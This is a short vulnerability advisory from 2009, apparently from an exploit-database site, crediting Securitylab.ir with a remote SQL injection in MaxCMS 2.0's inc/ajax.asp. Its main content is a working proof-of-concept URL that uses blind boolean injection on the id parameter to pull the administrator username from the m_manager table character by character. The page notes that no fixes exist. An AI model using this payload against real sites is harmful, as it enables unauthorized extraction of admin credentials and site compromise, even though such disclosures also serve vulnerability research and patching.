MaxCMS 2.0 (inc-ajax.asp) Remote SQL Injection Vulnerability

2009-05-18 00:05:34

######################### Securitylab.ir ########################
# Application Info:
# Name: Maxcms
# Version: 2.0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
# http://site.com/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.